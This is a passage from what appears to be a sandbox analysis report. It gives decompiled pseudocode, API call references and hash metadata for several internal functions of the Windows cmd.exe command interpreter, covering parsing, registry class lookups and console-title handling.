								_t101 =  *((intOrPtr*)( *0x121853c + _t100 * 4));
								_t125 = _t101 + 2;
								do {
									_t82 =  *_t101;
									_t101 = _t101 + 2;
								} while (_t82 !=  *((intOrPtr*)(_t128 - 4)));
								_t126 =  *((intOrPtr*)(_t128 - 0x3c));
								if((_t101 - _t125 >> 1) + _t119 < _t126) {
									__eflags = _t126 - _t119;
									E011E1040( *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t126 - _t119, _t116);
								} else {
									 *0x11fd580 = 0;
								}
								goto L45;
							}
							_t56 = _t79 - 1; // -1
							_t100 = _t56;
							L39:
							 *0x11fd57c = _t100;
							goto L40;
						}
						_t100 = _t99 + 1;
						 *0x11fd57c = _t100;
						if(_t100 < _t79) {
							goto L40;
						}
						_t100 = _t121;
						goto L39;
					}
					__eflags = _t70 - _t119;
					if(_t70 >= _t119) {
						_t122 =  *(_t128 - 0x1c);
						goto L29;
					}
					goto L27;
				}
				_t68 =  *0x11fd578; // 0x0
				if(_t68 !=  *(_t128 + 0x10)) {
					goto L4;
				}
				_t79 =  *0x11fd580; // 0x0
				_t99 =  *0x11fd57c; // 0x0
				_t119 =  *0x11fd574; // 0x0
				goto L33;
			}

























                                    0x011fb2bf
                                    0x011fb2c1
                                    0x011fb2c6
                                    0x011fb2cb
                                    0x011fb2ce
                                    0x011fb2d6
                                    0x011fb2db
                                    0x011fb2dd
                                    0x011fb2e2
                                    0x011fb4ca
                                    0x011fb4cf
                                    0x011fb4cf
                                    0x011fb2e8
                                    0x011fb2ea
                                    0x011fb2f0
                                    0x011fb312
                                    0x011fb312
                                    0x011fb314
                                    0x011fb317
                                    0x011fb319
                                    0x011fb31c
                                    0x011fb31c
                                    0x011fb31f
                                    0x011fb322
                                    0x011fb325
                                    0x011fb328
                                    0x011fb32f
                                    0x011fb32f
                                    0x011fb332
                                    0x011fb335
                                    0x011fb337
                                    0x00000000
                                    0x00000000
                                    0x011fb340
                                    0x011fb344
                                    0x011fb347
                                    0x011fb351
                                    0x011fb354
                                    0x011fb36d
                                    0x011fb36f
                                    0x011fb399
                                    0x011fb39c
                                    0x011fb3a0
                                    0x011fb3a3
                                    0x011fb3be
                                    0x011fb3be
                                    0x011fb3be
                                    0x011fb3c1
                                    0x011fb3c4
                                    0x011fb3c7
                                    0x011fb3c7
                                    0x011fb3c9
                                    0x011fb3cc
                                    0x011fb3cc
                                    0x00000000
                                    0x011fb3cc
                                    0x011fb3a5
                                    0x011fb3a8
                                    0x00000000
                                    0x00000000
                                    0x011fb3aa
                                    0x011fb3ae
                                    0x011fb3b5
                                    0x011fb3b5
                                    0x00000000
                                    0x011fb3b5
                                    0x011fb3b0
                                    0x011fb3b3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011fb3b3
                                    0x011fb377
                                    0x011fb37f
                                    0x011fb382
                                    0x011fb384
                                    0x011fb396
                                    0x00000000
                                    0x011fb396
                                    0x011fb386
                                    0x011fb386
                                    0x011fb389
                                    0x011fb38c
                                    0x011fb38e
                                    0x011fb391
                                    0x011fb391
                                    0x00000000
                                    0x011fb391
                                    0x011fb356
                                    0x011fb358
                                    0x011fb35a
                                    0x011fb35c
                                    0x011fb35c
                                    0x011fb361
                                    0x011fb366
                                    0x011fb368
                                    0x00000000
                                    0x011fb368
                                    0x011fb349
                                    0x011fb349
                                    0x011fb34c
                                    0x00000000
                                    0x011fb34c
                                    0x011fb3d2
                                    0x011fb3d5
                                    0x011fb3db
                                    0x011fb3db
                                    0x011fb3dd
                                    0x011fb3e5
                                    0x011fb3e9
                                    0x011fb3eb
                                    0x011fb3f7
                                    0x011fb402
                                    0x011fb404
                                    0x011fb408
                                    0x011fb41d
                                    0x011fb41f
                                    0x011fb40a
                                    0x011fb40c
                                    0x011fb40d
                                    0x011fb416
                                    0x011fb416
                                    0x011fb426
                                    0x011fb42c
                                    0x011fb431
                                    0x011fb436
                                    0x011fb438
                                    0x011fb43e
                                    0x011fb444
                                    0x011fb44a
                                    0x011fb44a
                                    0x011fb44c
                                    0x011fb44e
                                    0x011fb4b9
                                    0x011fb4b9
                                    0x011fb4c0
                                    0x011fb4c5
                                    0x00000000
                                    0x011fb4c5
                                    0x011fb454
                                    0x011fb465
                                    0x011fb465
                                    0x011fb468
                                    0x011fb46e
                                    0x011fb479
                                    0x011fb47e
                                    0x011fb481
                                    0x011fb483
                                    0x011fb486
                                    0x011fb486
                                    0x011fb489
                                    0x011fb48c
                                    0x011fb499
                                    0x011fb49e
                                    0x011fb4aa
                                    0x011fb4b4
                                    0x011fb4a0
                                    0x011fb4a2
                                    0x011fb4a2
                                    0x00000000
                                    0x011fb49e
                                    0x011fb470
                                    0x011fb470
                                    0x011fb473
                                    0x011fb473
                                    0x00000000
                                    0x011fb473
                                    0x011fb456
                                    0x011fb457
                                    0x011fb45f
                                    0x00000000
                                    0x00000000
                                    0x011fb461
                                    0x00000000
                                    0x011fb461
                                    0x011fb3d7
                                    0x011fb3d9
                                    0x011fb3e2
                                    0x00000000
                                    0x011fb3e2
                                    0x00000000
                                    0x011fb3d9
                                    0x011fb2f2
                                    0x011fb2fa
                                    0x00000000
                                    0x00000000
                                    0x011fb2fc
                                    0x011fb301
                                    0x011fb307
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • wcschr.MSVCRT ref: 011FB377
                                    • memcpy.MSVCRT ref: 011FB3F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcessmemcpywcschr
                                    • String ID: &()[]{}^=;!%'+,`~
                                    • API String ID: 3241892172-381716982
                                    • Opcode ID: 8b0a23908fb75cdb795a4fa811c3c8bef449d78a517bc53c237b2e3ca4f08200
                                    • Instruction ID: a4968a7c3d17b64c3cab38cdff0da4d815c3be77eff07a2c7b1b08b394f56e1c
                                    • Opcode Fuzzy Hash: 8b0a23908fb75cdb795a4fa811c3c8bef449d78a517bc53c237b2e3ca4f08200
                                    • Instruction Fuzzy Hash: 6C614DB0E08219CBCF2CCFA9E5945BDBBF1FB48314B25412EEA16E7254D7709941CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DDE4F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E011DDE4F(void* __eax, short* __ebx, void* __ecx) {
				void* __edi;
				short _t8;
				short _t9;
				intOrPtr _t18;
				short* _t24;
				long _t29;
				void* _t32;
				void* _t37;
				void* _t41;
				short _t42;
				void* _t46;
				intOrPtr* _t47;

				_t24 = __ebx;
				_t42 = 0;
				__imp___wcsicmp(L"REM/?", 0x120faa0, _t41, _t46, __ecx);
				_t50 = __eax;
				if(__eax == 0) {
					 *0x120faa6 = 0;
					_t42 = 1;
				}
				_t29 = 0x2d;
				_t47 = E011DE9A0(_t29, _t50);
				if(_t42 != 0) {
					_t8 = 0x2f;
					 *0x120faa0 = _t8;
					_t9 = 0x3f;
					 *0x120faa2 = _t9;
					 *0x120faa4 = 0;
				} else {
					E011DF030(0);
				}
				_t37 = 0x2d;
				if(E011DDCE1(_t24, _t37, _t42) != 0) {
					 *(_t47 + 0x38) =  *(_t47 + 0x38) & 0x00000000;
					 *_t47 = 0x3c;
					goto L8;
				} else {
					E011DF300(_t11, 0, 0, 0);
					if(E011DEEC8() == 0) {
						L8:
						return _t47;
					} else {
						_t32 = 0x20;
						if(E011DF030(_t32) != 0x4000) {
							E011DF300(_t15, 0, 0, 0);
							goto L8;
						} else {
							_t34 =  *0x120fa8c +  *0x120fa8c;
							_t18 = E011E00B0( *0x120fa8c +  *0x120fa8c);
							if(_t18 == 0) {
								E011F9287(_t34);
								__imp__longjmp(0x120b8b8, 1);
								asm("int3");
								__eflags = _t47;
								if(_t47 != 0) {
									 *_t24 = 0;
								}
								return _t24;
							} else {
								 *((intOrPtr*)(_t47 + 0x3c)) = _t18;
								E011E1040(_t18,  *0x120fa8c, 0x120faa0);
								goto L8;
							}
						}
					}
				}
			}















                                    0x011dde4f
                                    0x011dde5e
                                    0x011dde60
                                    0x011dde68
                                    0x011dde6a
                                    0x011ebcac
                                    0x011ebcb2
                                    0x011ebcb2
                                    0x011dde72
                                    0x011dde78
                                    0x011dde7c
                                    0x011ebcba
                                    0x011ebcbb
                                    0x011ebcc3
                                    0x011ebcc4
                                    0x011ebccc
                                    0x011dde82
                                    0x011dde84
                                    0x011dde84
                                    0x011dde8b
                                    0x011dde93
                                    0x011ebcd7
                                    0x011ebcdb
                                    0x00000000
                                    0x011dde99
                                    0x011dde9f
                                    0x011ddeab
                                    0x011ddee6
                                    0x011ddeeb
                                    0x011ddead
                                    0x011ddeaf
                                    0x011ddeba
                                    0x011ddef2
                                    0x00000000
                                    0x011ddebc
                                    0x011ddec1
                                    0x011ddec4
                                    0x011ddecb
                                    0x011ebce6
                                    0x011ebcf2
                                    0x011ebcf8
                                    0x011ebcf9
                                    0x011ebcfb
                                    0x011ebd03
                                    0x011ebd03
                                    0x011ddfb5
                                    0x011dded1
                                    0x011ddede
                                    0x011ddee1
                                    0x00000000
                                    0x011ddee1
                                    0x011ddecb
                                    0x011ddeba
                                    0x011ddeab

                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011DDE60
                                      • Part of subcall function 011DF300: _setjmp3.MSVCRT ref: 011DF318
                                      • Part of subcall function 011DF300: iswspace.MSVCRT ref: 011DF35B
                                      • Part of subcall function 011DF300: wcschr.MSVCRT ref: 011DF37D
                                      • Part of subcall function 011DF300: iswdigit.MSVCRT ref: 011DF3DE
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000), ref: 011EBCF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess_setjmp3_wcsicmpiswdigitiswspacelongjmpwcschr
                                    • String ID: REM/?
                                    • API String ID: 1631155197-4093888634
                                    • Opcode ID: c20010826fabd0c9a5c13c1458c966a1aafad18b07b7e2008b45c3bae48bcc55
                                    • Instruction ID: 3cd621842b3b1623e8b5610aff48c39ddc5880ce92bb9f8b570f225bb38cbc88
                                    • Opcode Fuzzy Hash: c20010826fabd0c9a5c13c1458c966a1aafad18b07b7e2008b45c3bae48bcc55
                                    • Instruction Fuzzy Hash: FF21F5223943129BEB3DAAB6B909B372291DF90655F15442FE602CB1C1EFB088428315
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F4A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E011F4A29(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				intOrPtr* _t33;
				intOrPtr _t34;
				signed int _t57;
				signed int _t59;
				long _t61;
				void* _t62;

				_push(0x1c);
				_push(0x11fc120);
				E011E7678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t62 - 0x2c)) = __ecx;
				_t59 = 0;
				 *((intOrPtr*)(_t62 - 0x24)) = 0;
				_t37 = 0;
				 *((intOrPtr*)(_t62 - 0x28)) = 0;
				_t61 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t62 - 0x20);
				 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
				if(_t61 == 0) {
					_t24 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0x2c)) + 0x3c)), "=", 3);
					 *((intOrPtr*)(_t62 - 0x2c)) = _t24;
					 *((intOrPtr*)(_t62 - 4)) = 0;
					if( *_t24 != 0) {
						_t59 = E011DDF40(E011E22C0(0, _t24));
						 *((intOrPtr*)(_t62 - 0x24)) = _t59;
						__eflags = _t59;
						if(_t59 != 0) {
							_t46 =  *(E011DD7E6( *((intOrPtr*)(_t62 - 0x2c)))) & 0x0000ffff;
							__eflags = _t46;
							if(_t46 != 0) {
								__eflags = _t46 - 0x3d;
								if(_t46 == 0x3d) {
									 *((intOrPtr*)(_t62 - 0x2c)) = E011DD7E6(_t29);
									_t37 = E011DDF40(E011E22C0(0, _t30));
									 *((intOrPtr*)(_t62 - 0x28)) = _t37;
									__eflags = _t37;
									if(_t37 != 0) {
										_t33 = E011DD7E6( *((intOrPtr*)(_t62 - 0x2c)));
										_t46 = 0;
										__eflags =  *_t33;
										if(__eflags == 0) {
											_t34 = E011F587B(_t37,  *(_t62 - 0x20), _t59, _t59, _t61, __eflags, _t37);
											goto L14;
										} else {
											_push(0);
											goto L9;
										}
									}
								} else {
									_push(0);
									L9:
									_push(0x232a);
									E011DC5A2(_t46);
								}
							} else {
								_t57 = _t59;
								goto L3;
							}
						}
					} else {
						_t57 = 0;
						L3:
						_t34 = E011F4B4E( *(_t62 - 0x20), _t57);
						L14:
						_t61 = _t34;
						 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
					}
					 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
					E011F4B3F(_t37, _t59);
					RegCloseKey( *(_t62 - 0x20));
					_t22 = _t61;
				}
				return E011E76BD(_t22);
			}










                                    0x011f4a29
                                    0x011f4a2b
                                    0x011f4a30
                                    0x011f4a35
                                    0x011f4a3a
                                    0x011f4a3c
                                    0x011f4a3f
                                    0x011f4a41
                                    0x011f4a5e
                                    0x011f4a60
                                    0x011f4a65
                                    0x011f4a78
                                    0x011f4a7d
                                    0x011f4a82
                                    0x011f4a88
                                    0x011f4aa4
                                    0x011f4aa6
                                    0x011f4aa9
                                    0x011f4aab
                                    0x011f4ab5
                                    0x011f4ab8
                                    0x011f4abb
                                    0x011f4ac1
                                    0x011f4ac4
                                    0x011f4add
                                    0x011f4aee
                                    0x011f4af0
                                    0x011f4af3
                                    0x011f4af5
                                    0x011f4afa
                                    0x011f4aff
                                    0x011f4b01
                                    0x011f4b04
                                    0x011f4b0f
                                    0x00000000
                                    0x011f4b06
                                    0x011f4b06
                                    0x00000000
                                    0x011f4b06
                                    0x011f4b04
                                    0x011f4ac6
                                    0x011f4ac6
                                    0x011f4ac8
                                    0x011f4ac8
                                    0x011f4acd
                                    0x011f4ad3
                                    0x011f4abd
                                    0x011f4abd
                                    0x00000000
                                    0x011f4abd
                                    0x011f4abb
                                    0x011f4a8a
                                    0x011f4a8a
                                    0x011f4a8c
                                    0x011f4a8f
                                    0x011f4b14
                                    0x011f4b14
                                    0x011f4b16
                                    0x011f4b16
                                    0x011f4b19
                                    0x011f4b20
                                    0x011f4b28
                                    0x011f4b2e
                                    0x011f4b2e
                                    0x011f4b35

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC120,0000001C,011F5CB1), ref: 011F4A58
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F4B28
                                      • Part of subcall function 011F587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                      • Part of subcall function 011F587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                      • Part of subcall function 011F587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$Close$CreateOpenValueiswspace
                                    • String ID: Software\Classes
                                    • API String ID: 1047774138-1656466771
                                    • Opcode ID: abeff3abc363dee804b817d6d02234e0540efd0bcc4ccd28699ad22e83900b33
                                    • Instruction ID: 16bbcc11c1592b2cd443cb292c473e01d7bef75e1f1bba585d0fb4a715f4daad
                                    • Opcode Fuzzy Hash: abeff3abc363dee804b817d6d02234e0540efd0bcc4ccd28699ad22e83900b33
                                    • Instruction Fuzzy Hash: CF319371F0421ACBDF1CEBF99854AAEB6B1AF98608F10406DD202BB691EB704900CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F51C5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E011F51C5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				intOrPtr* _t32;
				intOrPtr _t33;
				int _t55;
				int _t57;
				long _t59;
				void* _t60;

				_push(0x1c);
				_push(0x11fc0c0);
				E011E7678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t60 - 0x2c)) = __ecx;
				_t57 = 0;
				 *((intOrPtr*)(_t60 - 0x24)) = 0;
				_t36 = 0;
				 *((intOrPtr*)(_t60 - 0x28)) = 0;
				_t59 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t60 - 0x20);
				 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
				if(_t59 == 0) {
					_t24 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t60 - 0x2c)) + 0x3c)), "=", 3);
					 *((intOrPtr*)(_t60 - 0x2c)) = _t24;
					 *((intOrPtr*)(_t60 - 4)) = 0;
					if( *_t24 != 0) {
						_t57 = E011DDF40(E011E22C0(0, _t24));
						 *((intOrPtr*)(_t60 - 0x24)) = _t57;
						if(_t57 != 0) {
							_t45 =  *(E011DD7E6( *((intOrPtr*)(_t60 - 0x2c)))) & 0x0000ffff;
							if(_t45 != 0) {
								if(_t45 == 0x3d) {
									 *((intOrPtr*)(_t60 - 0x2c)) = E011DD7E6(_t29);
									_t36 = E011DDF40(_t30);
									 *((intOrPtr*)(_t60 - 0x28)) = _t36;
									if(_t36 != 0) {
										_t32 = E011DD7E6( *((intOrPtr*)(_t60 - 0x2c)));
										_t45 = 0;
										if( *_t32 == 0) {
											_t33 = L011F59E6( *(_t60 - 0x20), _t57, _t36);
											goto L14;
										} else {
											_push(0);
											goto L9;
										}
									}
								} else {
									_push(0);
									L9:
									_push(0x232a);
									E011DC5A2(_t45);
								}
							} else {
								_t55 = _t57;
								goto L3;
							}
						}
					} else {
						_t55 = 0;
						L3:
						_t33 = L011F4CF0( *(_t60 - 0x20), _t55);
						L14:
						_t59 = _t33;
						 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
					}
					 *((intOrPtr*)(_t60 - 4)) = 0xfffffffe;
					E011F52D4(_t36, _t57);
					RegCloseKey( *(_t60 - 0x20));
					_t22 = _t59;
				}
				return E011E76BD(_t22);
			}










                                    0x011f51c5
                                    0x011f51c7
                                    0x011f51cc
                                    0x011f51d1
                                    0x011f51d6
                                    0x011f51d8
                                    0x011f51db
                                    0x011f51dd
                                    0x011f51fa
                                    0x011f51fc
                                    0x011f5201
                                    0x011f5214
                                    0x011f5219
                                    0x011f521e
                                    0x011f5224
                                    0x011f5240
                                    0x011f5242
                                    0x011f5247
                                    0x011f5251
                                    0x011f5257
                                    0x011f5260
                                    0x011f5279
                                    0x011f5283
                                    0x011f5285
                                    0x011f528a
                                    0x011f528f
                                    0x011f5294
                                    0x011f5299
                                    0x011f52a4
                                    0x00000000
                                    0x011f529b
                                    0x011f529b
                                    0x00000000
                                    0x011f529b
                                    0x011f5299
                                    0x011f5262
                                    0x011f5262
                                    0x011f5264
                                    0x011f5264
                                    0x011f5269
                                    0x011f526f
                                    0x011f5259
                                    0x011f5259
                                    0x00000000
                                    0x011f5259
                                    0x011f5257
                                    0x011f5226
                                    0x011f5226
                                    0x011f5228
                                    0x011f522b
                                    0x011f52a9
                                    0x011f52a9
                                    0x011f52ab
                                    0x011f52ab
                                    0x011f52ae
                                    0x011f52b5
                                    0x011f52bd
                                    0x011f52c3
                                    0x011f52c3
                                    0x011f52ca

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC0C0,0000001C,011F5CE1), ref: 011F51F4
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F52BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$CloseOpeniswspace
                                    • String ID: Software\Classes
                                    • API String ID: 2439148603-1656466771
                                    • Opcode ID: 4dd9ddeb385e1cd5fbcbc5630ad4a82afa5d8ba7ba8324beceffa71e89ef2d1b
                                    • Instruction ID: 188134ed55947d5e37ba7f7e500ab3202b526c03b3a4153a5a2b73b58eeda4e9
                                    • Opcode Fuzzy Hash: 4dd9ddeb385e1cd5fbcbc5630ad4a82afa5d8ba7ba8324beceffa71e89ef2d1b
                                    • Instruction Fuzzy Hash: 8E21B475E04306CBDF5CEBF9D8546ADB6F2AF98618F11812DE502BB294EB704D01CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E100C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011E100C(long __eax, intOrPtr* __ecx) {
				intOrPtr _v8;
				signed int _v12;
				long _t13;
				intOrPtr _t14;
				signed int _t15;
				short _t21;
				signed int _t24;
				intOrPtr* _t26;
				intOrPtr* _t29;
				WCHAR* _t35;
				long _t40;
				intOrPtr _t43;
				short* _t44;
				WCHAR* _t47;
				void* _t48;
				WCHAR* _t49;

				_t13 = __eax;
				_t26 = __ecx;
				if(__ecx != 0 &&  *0x1213cc4 == 0 &&  *0x1213ccc == 0) {
					_t13 = E011E00B0(0x20c);
					_t47 = _t13;
					if(_t47 != 0) {
						_t13 = GetConsoleTitleW(_t47, 0x104);
						_t40 = _t13;
						if(_t40 != 0) {
							_v12 = _v12 & 0x00000000;
							_t29 = _t26;
							_t3 = _t29 + 2; // 0x2
							_t48 = _t3;
							do {
								_t14 =  *_t29;
								_t29 = _t29 + 2;
							} while (_t14 != _v12);
							_t15 =  *0x11fd570; // 0x0
							_t17 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
							_v8 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
							_t49 = E011E0100(_t47, _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa + _t17);
							if(_t49 == 0) {
								L16:
								return E011E0040(_t47);
							}
							_t47 = _t49;
							_t43 = _v8;
							if( *0x11fd59c == 0) {
								E011E18C0(_t49, _t43, L" - ");
								_t35 = _t49;
								_t10 =  &(_t35[1]); // 0x2
								_t44 = _t10;
								do {
									_t21 =  *_t35;
									_t35 =  &(_t35[1]);
								} while (_t21 != _v12);
								 *0x11fd570 = _t35 - _t44 >> 1;
								E011E18C0(_t49, _v8, _t26);
								 *0x11fd59c = 1;
								L15:
								SetConsoleTitleW(_t49);
								goto L16;
							}
							_t24 =  *0x11fd570; // 0x0
							E011E1040( &(_t49[_t24]), _t43 - _t24, _t26);
							goto L15;
						}
					}
				}
				return _t13;
			}



















                                    0x011e100c
                                    0x011e1015
                                    0x011e101b
                                    0x011ecdca
                                    0x011ecdcf
                                    0x011ecdd3
                                    0x011ecddf
                                    0x011ecde5
                                    0x011ecde9
                                    0x011ecdef
                                    0x011ecdf3
                                    0x011ecdf5
                                    0x011ecdf5
                                    0x011ecdf8
                                    0x011ecdf8
                                    0x011ecdfb
                                    0x011ecdfe
                                    0x011ece04
                                    0x011ece14
                                    0x011ece16
                                    0x011ece21
                                    0x011ece25
                                    0x011ece87
                                    0x00000000
                                    0x011ece89
                                    0x011ece2e
                                    0x011ece30
                                    0x011ece33
                                    0x011ece4e
                                    0x011ece53
                                    0x011ece55
                                    0x011ece55
                                    0x011ece58
                                    0x011ece58
                                    0x011ece5b
                                    0x011ece5e
                                    0x011ece6b
                                    0x011ece74
                                    0x011ece79
                                    0x011ece80
                                    0x011ece81
                                    0x00000000
                                    0x011ece81
                                    0x011ece35
                                    0x011ece40
                                    0x00000000
                                    0x011ece40
                                    0x011ecde9
                                    0x011ecdd3
                                    0x011e102c

                                    APIs
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,011E0B7F), ref: 011ECDDF
                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 011ECE81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleTitle
                                    • String ID: -
                                    • API String ID: 3358957663-3695764949
                                    • Opcode ID: 93ba80149b28576f0529ffd912952ffa009b93b1c03078cd9537d4d9349b9673
                                    • Instruction ID: bce5c884affaa0be082da193b3b4460890e0cb0b0d94b9947ffa115a1213973f
                                    • Opcode Fuzzy Hash: 93ba80149b28576f0529ffd912952ffa009b93b1c03078cd9537d4d9349b9673
                                    • Instruction Fuzzy Hash: 3421E47270090167CB2D9BECE85C7BE7EF2AB84714F19412CD91697249EF315946CBC2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F8430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E011F8430(void* __ecx, void* __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a52) {
				void* _t14;
				void* _t26;
				void* _t31;

				_t26 = __edx;
				_t25 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if((_a4 | _a8) == 0) {
					_t31 = 0x64;
				} else {
					_t31 = E011E8100(E011E81B0(_a12, _a16, 0x64, 0), _t26, _a4, _a8);
				}
				_t23 = L"%3d";
				E011E274C(0x1213d00, 0x104, L"%3d", _t31);
				E011DC108(_t25, 0x40002722, 1, 0x1213d00);
				if( *0x11fd544 == 0) {
					_t14 = 0;
				} else {
					E011E274C(0x1213d00, 0x104, _t23, _t31);
					E011DC108(_t25, 0x40002722, 1, 0x1213d00);
					printf("\n");
					_t14 = (0 | _a52 != 0x00000000) + 1;
				}
				return _t14;
			}






                                    0x011f8430
                                    0x011f8430
                                    0x011f8435
